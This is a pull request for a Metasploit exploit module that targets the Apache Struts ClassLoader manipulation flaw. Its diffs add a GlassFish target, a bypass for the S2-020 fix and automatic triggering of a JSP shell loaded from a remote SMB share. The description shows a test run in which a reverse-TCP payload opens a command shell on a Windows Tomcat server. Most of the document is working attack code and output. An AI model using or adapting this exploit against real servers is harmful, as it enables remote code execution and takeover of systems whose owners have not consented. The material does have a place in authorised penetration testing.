### PR TITLE
Add improvements for docBase exploitation vector

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -84,12 +84,10 @@ class Metasploit3 < Msf::Exploit::Remote
         Opt::RPORT(8080),
         OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']]),
         OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
-        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]),
-        OptString.new('FILE_NAME', [ true, 'The JSP file with the payload (target dependant)', 'HelloWorld.jsp']),
-        OptString.new('FOLDER_NAME', [ true, 'The Folder where the JSP payload lives (target dependant)', 'example'])
+        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
       ], self.class)
 
-    deregister_options('FILE_CONTENTS')
+    deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME', 'FILE_CONTENTS')
   end
 
   def jsp_dropper(file, exe)
@@ -226,6 +224,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   # Used with SMB targets
   def primer
+    self.file_name << '.jsp'
     self.file_contents = payload.encoded
     print_status("JSP payload available on #{unc}...")
 
@@ -237,6 +236,16 @@ class Metasploit3 < Msf::Exploit::Remote
       'vars_get' => {
         'class[\'classLoader\'].resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
       }
+    })
+
+    jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/')
+    jsp_shell << "/#{self.file_name}"
+
+    print_status("#{peer} - Accessing JSP shell at #{jsp_shell}...")
+    send_request_cgi({
+      'uri'     => normalize_uri(jsp_shell),
+      'version' => '1.1',
+      'method'  => 'GET',
     })
   end
 

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
               'Platform' => 'win'
             }
           ],
-          ['Windows / Tomcat 6 & 7 (Remote SMB Resource)',
+          ['Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)',
             {
               'Arch'     => ARCH_JAVA,
               'Platform' => 'win'
@@ -235,7 +235,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'version' => '1.1',
       'method'  => 'GET',
       'vars_get' => {
-        'class.classLoader.resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
+        'class[\'classLoader\'].resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
       }
     })
   end

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -297,9 +297,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Check log file... enjoy shell!
-    unless target['Arch'] == ARCH_JAVA
-      check_log_file(random_request)
-    end
+    check_log_file(random_request)
 
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
@@ -309,12 +307,6 @@ class Metasploit3 < Msf::Exploit::Remote
         :file_date_format => ''
     }
     modify_class_loader(properties)
-
-    if target['Arch'] == ARCH_JAVA
-      send_request_cgi({ 'uri'     => normalize_uri("/", @jsp_file) })
-    end
-
   end
-
 end
 

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -200,11 +200,8 @@ class Metasploit3 < Msf::Exploit::Remote
       end
       payload_file = rand_text_alphanumeric(4 + rand(4))
       jsp = jsp_dropper(payload_file, payload_exe)
-      if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
-        register_files_for_cleanup("../webapps/ROOT/#{payload_file}")
-      else
-        register_files_for_cleanup(payload_file)
-      end
+
+      register_files_for_cleanup(payload_file)
     end
 
     jsp
@@ -274,11 +271,8 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
     end
 
-    if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
-      register_files_for_cleanup("../webapps/ROOT/#{@jsp_file}")
-    else
-      register_files_for_cleanup(@jsp_file)
-    end
+    # This path depends on CWD. May require manual cleanup
+    register_files_for_cleanup("webapps/ROOT/#{@jsp_file}")
 
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
@@ -308,5 +302,6 @@ class Metasploit3 < Msf::Exploit::Remote
     }
     modify_class_loader(properties)
   end
+
 end
 


### PR DESCRIPTION
Added the following improvements to the module:
- Added GlassFish app server as a target
- Added bypass for S2-020 (fixed in S2-021)
- Make UNC resource (share, file name and file folder) random but using ".jsp" extension
- Added auto-triggering of the JSP shell

Testing env:
- rev: a13cd2bcb7d41ddf099ceb6ab93c4d6a67dd3f5b
- Windows XP
- Tomcat 7.0.59

```
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.17.1.63                yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.1.3       yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   3   Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)
```

```
msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started reverse handler on 172.17.1.3:4444 
[*] Server started.
[*] JSP payload available on \\172.16.218.197\bnekdX\crNveL.jsp...
[*] 172.17.1.63:8080 - Modifying Class Loader...
[*] 172.17.1.63:8080 - Accessing JSP shell at /hello_world/crNveL.jsp...
[*] Command shell session 1 opened (172.17.1.3:4444 -> 172.17.1.63:3545) at 2015-03-07 20:37:20 +0100
[*] Server stopped.

Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test>
```
